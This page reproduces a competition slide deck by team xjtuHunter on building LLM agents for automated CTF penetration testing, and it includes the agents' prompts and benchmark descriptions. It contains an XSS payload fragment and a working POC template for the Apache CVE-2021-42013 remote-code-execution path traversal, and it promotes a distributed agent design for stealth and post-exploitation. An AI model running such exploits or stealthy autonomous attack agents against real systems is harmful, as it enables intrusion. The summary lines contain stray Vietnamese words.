行业研究公司研究宏观策略财报招股书会议纪要 Token 低空经济十五五 AIGC 大模型

腾讯云黑客松智能渗透挑战赛决赛答辩-xjtuHunter

2025-12-09 腾讯 @·*&&

胡宇睿的研报围绕AI在网络安全的 ứng dụng 展开，分为四个部分：

PART 01 经验洞察——Agent的开发之道

AI发展历程：上半场以算力和数据驱动基础设施建设，下半场转向架构与评估驱动的价值实现。
垂域专用Agent：强调针对特定领域开发专用Agent，而非通用模型。
评估标准：提出通用基准MMLU（116题）和专有基准XBOW（104题）、AutoPenBench（33题），涵盖侦查覆盖率、漏洞检出率、利用成功率、攻击链构建能力等维度。
核心要素：Agent架构需关注多智能体协同和反思记忆能力。

PART 02 ——黑盒渗透的实战解决方案

设计背景：漏洞检测从“盲打”转向“精打”，关注业务逻辑交互。
场景感知检测：通过页面探索、场景塑造、漏洞检测三步流程，实现漏洞与业务强关联。
关键步骤：
- 页面探索：分析请求和响应，提取关键信息。
- 场景塑造：基于历史请求和关键信息，推理业务场景和漏洞类型。
- 漏洞检测：针对SQLI、XSS、UPLOAD等漏洞进行自动化检测。
工具库：包含批量检测工具、请求工具等。

PART 03 ——小镇做题家的生存智慧

工具调用优化：通过POC迁移和后利用技术提升效率。
常态化题海战术：通过大量练习提升解题能力。
分布式Agent架构：采用分布式架构提升并发效率和隐蔽性，支持后渗透框架。

PART 04 未来已来——打造AI+网安浪潮的掌舵手

未来规划：继续探索AI在网络安全的 ứng dụng ，推动AI+网络安全工业化进程。

胡宇睿｜xjtuHunter About me 胡宇睿| xjtuHunter 西安交通大学网络空间安全学院博士生研究领域：开源漏洞治理、AI赋能安全、高级威胁狩猎，主导的多项大模型+网络安全研究工作发表于ASE、S&P等国际顶级会议。多年攻防与CTF赛事经验，连续四年教育部攻防演练第一名，2025年国家护网攻击队主力成员。持续的AI+应用开发者，开发的多项大模型+安全产品投入企业落地场景，积极探索AI+网络安全的工业化经验。 PART 01PART 02PART 03经验洞察Agent的开发之道架构为王黑盒渗透的实战解决方案细节至上小镇做题家的生存智慧目录CONTENTSPART 04未来已来打造AI+网安浪潮的掌舵手 PART 01 经验洞察——Agent的开发之道 AI下半场：从“有无问题”到“价值问题” 上半场：算力与数据驱动的基础设施建设——“更大、更多、更快” 下半场：架构与评估驱动的价值实现——“更准、更稳、更可用” 垂域专用Agent 评估标准评估标准：Agent架构的设计锚点通用基准：MMLU（15908题）-Computer security（116题）真实渗透测试任务静态知识vs.动态操作孤立知识点vs.多步复杂流程理论最优解vs.实战适应性结果判断简单vs.结果验证复杂孤立、去上下文的知识切片有状态的、多步骤的复杂流程答案对错即时可判综合大量反馈验证没有固定答案评估标准：Agent架构的设计锚点专有基准：XBOW（104题）覆盖多种CTF种常见的漏洞类型，采用真实CTF夺旗结果评判Agent对于漏洞利用的自动化完成度 AutoPenBench（33题）涵盖Web、网络、密码学等多领域，采用里程碑式评分，评估多步骤任务的自动化完成度核心评估维度：侦查覆盖率：能否发现所有开放的端口、隐藏的路径、未引用的API端点？漏洞检出率与误报率：能否准确识别真实漏洞（TP），并有效降低误报（FP）？利用成功率：发现的漏洞能否被成功利用（例如，获取shell、提取敏感数据）？攻击链构建能力：能否将多个漏洞串联，形成完整的攻击路径？反思与记忆多智能体协同 PART 02 ——黑盒渗透的实战解决方案设计背景：漏洞检测从“盲打”到“精打” 漏洞存在于业务逻辑的交互中，而非孤立的代码里。 XBEN-022 孤立检测：高误报/漏报文件上传-> LFI-> SSTI 1）理解error_type在上传与文件包含接口的数据流传递关系控制依赖：用户登录->获取令牌->后台权限操作 2）综合多个漏洞接口顺序调用数据依赖：下订单->订单列表->查看订单/修改订单/删除订单 XBEN-025、056 降低误报率 SSTI出现在注册最后一步 1）控制流：注册->用户名渲染场景感知检测：漏洞与业务强关联关键步骤一：页面探索你可以根据已有的信息和网站功能进行网页的浏览与探索，你需要在一个回答里把所有需要探索的网页都探索完成。你需要集中于获取更多网页交互请求，即需要进行以下操作：1.你需要尽可能地使用当前已经获取到的关键信息，比如收集到的用户名和密码需要尽可能使用，不要自己直接构造，注意不要爆破参数，每个参数只需要测试最可能的值即可；2.你需要访问所有原页面的url和api接口，保证所有新页面都要访问到，关键信息中可能提示的参数也需要使用，当你构造POST请求参数时需要严格按照页面表单中的参数构造3.尽可能多的访问新网页或对api发送网络请求，只能发送正常请求参数，不可以进行漏洞探测，不可以发送任何危险参数4.使用xml格式返回响应5.如果没有当前页面则为初始请求，访问系统url即可6.不要访问登出功能，不要访问css和图像，不要通过猜测路径获取新页面，如果所有已知的路径均访问完成，返回"任务已完成"即可7.如果是修改用户信息（包括密码）请求，请将修改后的信息和原信息设置为一样，避免篡改信息8.对于工具请求的构造，value由多个xml子标签构成，如果xml子标签中的值出现特殊字符，使用request{request_desc} CTF URL Request XML request GET

True Response RequestUrlHeaderParam HeaderContentRedirect 关键步骤一：页面探索你专注于从页面请求和响应中提取关键信息你需要仔细分析响应页面中的关键信息和请求包中的参数信息给出最终的分析结果，比如注册时提交的用户名密码等键值和页面的响应信息你需要返回xml格式结果，格式如下：页面简单命名（10个字以内）{flag_result} Page Request NameDescriptionKey Response 关键步骤二：场景塑造你是一个ctf题目解决者，你需要根据历史请求与响应包和获取的关键信息来生成针对业务场景的漏洞检测的思路。你需要一步步推理与得出最终的检测思路，推理步骤如下：1）历史请求中的哪些请求可能关联为业务场景2）该业务场景中的哪些功能点可能存在漏洞3）对于这些漏洞生成xml格式的最终检测思路：漏洞类型，为字母缩写，支持：IDOR（越权）、SSTI、XSS、SQLI、UPLOAD（文件上传漏洞）、LFI（本地文件包含）、CMD（命令注入）、OTHER利用方式的自然语言描述，不需要指明要检测的参数，也不可以描述载荷，概括性介绍利用方法即可...注意：1.请尽量发挥创意，发掘更多可能的solution，请仔细分析当前请求，尽量发现所有可能存在的漏洞点2.不要进行常规漏洞检测思路，如框架、备份文件漏洞等3. OTHER类型漏洞可以提出多种检测思路，尽可能多地提出检测思路...... 页面库页面名称关键信息页面名称关键信息关键步骤三：漏洞检测检测类型SQLI、XSS、UPLOAD、SSTI、LFI、IDOR、CMD、OTHER 强人工经验知识库你必须按照以下流程进行XSS漏洞检测：1.不管是否存在过滤，你都需要首先调用工具：来进行载荷的批量检测，工具会进行载荷的批量测试2.分析批量载荷的执行结果，如果未发现利用成功载荷可以根据响应进行载荷变形，使用request工具分步测试3.如果出现某些方法或者网络请求的报错而非载荷本身的报错，调整请求方法重新进行工具调用4.如果所有载荷均无法测试成功，你需要观察页面请求和响应，尝试添加"、>等字符进行逃逸5.你最终必须实现alert('XSS') SRC=javascript:alert('XSS')>

...... Payload [a, b, c, ...]-Response xPayload [d, e, ...]-Response y 工具库整体流程演示-页面探索整体流程演示-场景塑造整体流程演示-漏洞检测 PART 03 ——小镇做题家的生存智慧工具调用优化 POC迁移与后利用 name: "Apache HTTP Server 2.4.50 RCE (CVE-2021-42013)"description: "利用Apache HTTP Server 2.4.50的路径规范化缺陷，攻击者通过构造恶意请求绕过访问限制，在受影响服务器上执行任意系统命令，可导致服务器完全被控制、敏感数据泄露或服务不可用。"severity: "critical" -"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42013" requests:-steps:-method: "POST"path: "/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh"headers:User-Agent: "Mozilla/5.0"Content-Type: "application/x-www-form-urlencoded"body: "echo; echo 'VULN_TEST'"matchers:-type: "word"words: ["VULN_TEST"]condition: "and"-type: "status"status: [200] 常态化题海战术分布式Agent架构采用分布式架构设计，将任务管理与任务执行解耦，支持多平台多节点Agent统一调度 -提升并发效率-增加后端隐蔽性-天然的后渗透框架比赛解题规划赛段周期：3h 单次做题周期：30min｜单次并发做题数：3｜并发进程数：4 PART 04 未来已来——打造AI+网安浪潮的掌舵手未来规划 THANKS 演讲人TITLE

点击免费查看完整报告

腾讯云黑客松智能渗透挑战赛决赛答辩-xjtuHunter

你可能感兴趣

腾讯云黑客松智能渗透挑战赛决赛答辩-yhy

腾讯云黑客松智能渗透挑战赛决赛答辩-长亭外

腾讯云黑客松智能渗透挑战赛决赛答辩-Pachinko

腾讯云黑客松智能渗透挑战赛决赛答辩-Antix

腾讯云黑客松智能渗透挑战赛决赛答辩-sickhack(第十)

腾讯云黑客松智能渗透挑战赛决赛答辩-ai 小分队

腾讯云黑客松智能渗透挑战赛决赛答辩-NeuroSploit

腾讯云黑客松智能渗透挑战赛决赛答辩-BinX

腾讯云黑客松智能渗透挑战赛决赛答辩-D@wnEdg3

2026腾讯云黑客松-第二届智能渗透挑战赛-戴夫的后花园